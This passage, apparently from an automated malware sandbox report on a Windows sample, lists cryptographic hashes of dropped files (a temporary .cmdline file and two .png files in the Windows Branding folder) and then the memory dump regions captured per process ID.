  SHA256: 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
  SHA512: 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
- \??\c:\Users\Admin\AppData\Local\Temp\gne0it5f\gne0it5f.cmdline
  MD5: 9a845fff3e6129e3598729f0de2ad3b2
  SHA1: c37050d4bc452606fc9a47b99230d1efba53902f
  SHA256: 670e12c8ceb91141d9cb2729f52f686879a667398ea5e7a338063dfbca9e6a9a
  SHA512: 2ce2b1d5d48fbcfa0cda8442f732f75e2c80ea3506f114e4e5d5505f1e33849e40bceb3caf4ac6a01a8a681235719070824e9741f4e866d318c22b9a895bd18f
- \Windows\Branding\mediasrv.png
  MD5: 590ae32e6e9072e2b0ad71650d787af9
  SHA1: 0ab159b2b34b3ebcfdef8e9857fcd09605bbb0c7
  SHA256: 42d111d512d35fc3ae7a82399ee2cb9403836ddc676237c16a73cba14e7e72bc
  SHA512: 2b89db1d9229c9baa3cee7700609004cb0313d85886b7652500ba0c6ddee3aa80c39ea6e39ad84f3dba4527e202cf639068d26d93a004a25e90e69d14766179b
- \Windows\Branding\mediasvc.png
  MD5: c4184e993992dc9b9bb7d2b536311f98
  SHA1: fa3a97ac00dbdc7db025d40edf8013cc74d2244f
  SHA256: 81bd39baea5ba98b725f2362f09c41550bb768da73f174ef032e1a6b6318c6f6
  SHA512: d10f9f40da51ca5a71fa473d5521d103dfa55e681b72e789627b8406e3b7158a9621a6a233b1dab905823f4335c1aba27fd5d819f61179227b8ede17ba5f4c19
- memory/240-191-0x0000000000000000-mapping.dmp
- memory/240-183-0x0000000000000000-mapping.dmp
- memory/332-194-0x0000000000000000-mapping.dmp
- memory/332-168-0x0000000000000000-mapping.dmp
- memory/436-184-0x0000000000000000-mapping.dmp
- memory/572-75-0x0000000000000000-mapping.dmp
- memory/652-176-0x0000000000000000-mapping.dmp
- memory/672-174-0x0000000000000000-mapping.dmp
- memory/672-196-0x0000000000000000-mapping.dmp
- memory/788-59-0x0000000041490000-0x00000000418B1000-memory.dmp (Filesize: 4.1MB)
- memory/788-64-0x00000000283A7000-0x00000000283A8000-memory.dmp (Filesize: 4KB)
- memory/788-63-0x00000000283A6000-0x00000000283A7000-memory.dmp (Filesize: 4KB)
- memory/788-61-0x00000000283A2000-0x00000000283A4000-memory.dmp (Filesize: 8KB)
- memory/788-62-0x00000000283A4000-0x00000000283A6000-memory.dmp (Filesize: 8KB)
- memory/820-166-0x0000000000000000-mapping.dmp
- memory/820-197-0x0000000000000000-mapping.dmp
- memory/960-87-0x0000000000000000-mapping.dmp
- memory/960-98-0x0000000001F60000-0x0000000001F61000-memory.dmp (Filesize: 4KB)
- memory/960-93-0x0000000002310000-0x0000000002311000-memory.dmp (Filesize: 4KB)
- memory/960-95-0x000000001B910000-0x000000001B911000-memory.dmp (Filesize: 4KB)
- memory/960-97-0x00000000026F0000-0x00000000026F1000-memory.dmp (Filesize: 4KB)
- memory/960-99-0x000000001AC20000-0x000000001AC22000-memory.dmp (Filesize: 8KB)
- memory/960-100-0x000000001AC24000-0x000000001AC26000-memory.dmp (Filesize: 8KB)
- memory/960-106-0x000000001B5B0000-0x000000001B5B1000-memory.dmp (Filesize: 4KB)
- memory/960-120-0x0000000002740000-0x0000000002741000-memory.dmp (Filesize: 4KB)
- memory/960-119-0x0000000002660000-0x0000000002661000-memory.dmp (Filesize: 4KB)
- memory/968-162-0x0000000000000000-mapping.dmp
- memory/1108-164-0x0000000000000000-mapping.dmp
- memory/1108-190-0x0000000000000000-mapping.dmp
- memory/1160-170-0x0000000000000000-mapping.dmp
- memory/1352-169-0x0000000000000000-mapping.dmp
- memory/1396-69-0x00000000024C0000-0x00000000024C1000-memory.dmp (Filesize: 4KB)
- memory/1396-84-0x000000001B6F0000-0x000000001B6F1000-memory.dmp (Filesize: 4KB)
- memory/1396-74-0x000000001B560000-0x000000001B561000-memory.dmp (Filesize: 4KB)
- memory/1396-156-0x000000001C2C0000-0x000000001C2C1000-memory.dmp (Filesize: 4KB)
- memory/1396-66-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmp (Filesize: 8KB)
- memory/1396-71-0x00000000025D4000-0x00000000025D6000-memory.dmp (Filesize: 8KB)
- memory/1396-82-0x00000000025B0000-0x00000000025B1000-memory.dmp (Filesize: 4KB)
- memory/1396-72-0x0000000002570000-0x0000000002571000-memory.dmp (Filesize: 4KB)
- memory/1396-68-0x000000001AA00000-0x000000001AA01000-memory.dmp (Filesize: 4KB)
- memory/1396-65-0x0000000000000000-mapping.dmp
- memory/1396-85-0x000000001B770000-0x000000001B771000-memory.dmp (Filesize: 4KB)
- memory/1396-70-0x00000000025D0000-0x00000000025D2000-memory.dmp (Filesize: 8KB)
- memory/1396-86-0x000000001B630000-0x000000001B631000-memory.dmp (Filesize: 4KB)
- memory/1396-67-0x0000000001F90000-0x0000000001F91000-memory.dmp (Filesize: 4KB)
- memory/1396-101-0x00000000025DA000-0x00000000025F9000-memory.dmp (Filesize: 124KB)
- memory/1448-161-0x0000000000000000-mapping.dmp
- memory/1488-78-0x0000000000000000-mapping.dmp
- memory/1488-163-0x0000000000000000-mapping.dmp
- memory/1588-198-0x0000000000000000-mapping.dmp
- memory/1588-209-0x0000000000000000-mapping.dmp
- memory/1624-193-0x0000000000000000-mapping.dmp
- memory/1624-199-0x0000000000000000-mapping.dmp
- memory/1628-175-0x0000000000000000-mapping.dmp
- memory/1652-206-0x00000000194D4000-0x00000000194D6000-memory.dmp (Filesize: 8KB)
- memory/1652-200-0x0000000000000000-mapping.dmp
- memory/1652-185-0x0000000000000000-mapping.dmp
- memory/1652-207-0x00000000194DA000-0x00000000194F9000-memory.dmp (Filesize: 124KB)
- memory/1652-205-0x00000000194D0000-0x00000000194D2000-memory.dmp (Filesize: 8KB)
- memory/1656-160-0x0000000000000000-mapping.dmp
- memory/1716-165-0x0000000000000000-mapping.dmp
- memory/1764-131-0x000000001B600000-0x000000001B601000-memory.dmp (Filesize: 4KB)
- memory/1764-167-0x0000000000000000-mapping.dmp
- memory/1764-127-0x000000001AA84000-0x000000001AA86000-memory.dmp (Filesize: 8KB)
- memory/1764-121-0x0000000000000000-mapping.dmp
- memory/1764-134-0x0000000002110000-0x0000000002111000-memory.dmp (Filesize: 4KB)
- memory/1764-133-0x000000001B690000-0x000000001B691000-memory.dmp (Filesize: 4KB)
- memory/1764-129-0x000000001B3B0000-0x000000001B3B1000-memory.dmp (Filesize: 4KB)
- memory/1764-126-0x000000001AA80000-0x000000001AA82000-memory.dmp (Filesize: 8KB)
- memory/1800-208-0x0000000000000000-mapping.dmp
- memory/1800-177-0x0000000000000000-mapping.dmp
- memory/1848-157-0x0000000000000000-mapping.dmp
- memory/1848-178-0x0000000000000000-mapping.dmp
- memory/1908-187-0x0000000000000000-mapping.dmp
- memory/1912-179-0x0000000000000000-mapping.dmp
- memory/1912-159-0x0000000000000000-mapping.dmp
- memory/1920-172-0x0000000000000000-mapping.dmp
- memory/1928-195-0x0000000000000000-mapping.dmp
- memory/1928-155-0x000000001AAB4000-0x000000001AAB6000-memory.dmp (Filesize: 8KB)
- memory/1928-154-0x000000001AAB0000-0x000000001AAB2000-memory.dmp (Filesize: 8KB)
- memory/1928-142-0x0000000000000000-mapping.dmp
- memory/1980-186-0x0000000000000000-mapping.dmp
- memory/1980-173-0x0000000000000000-mapping.dmp
- memory/1984-182-0x0000000000000000-mapping.dmp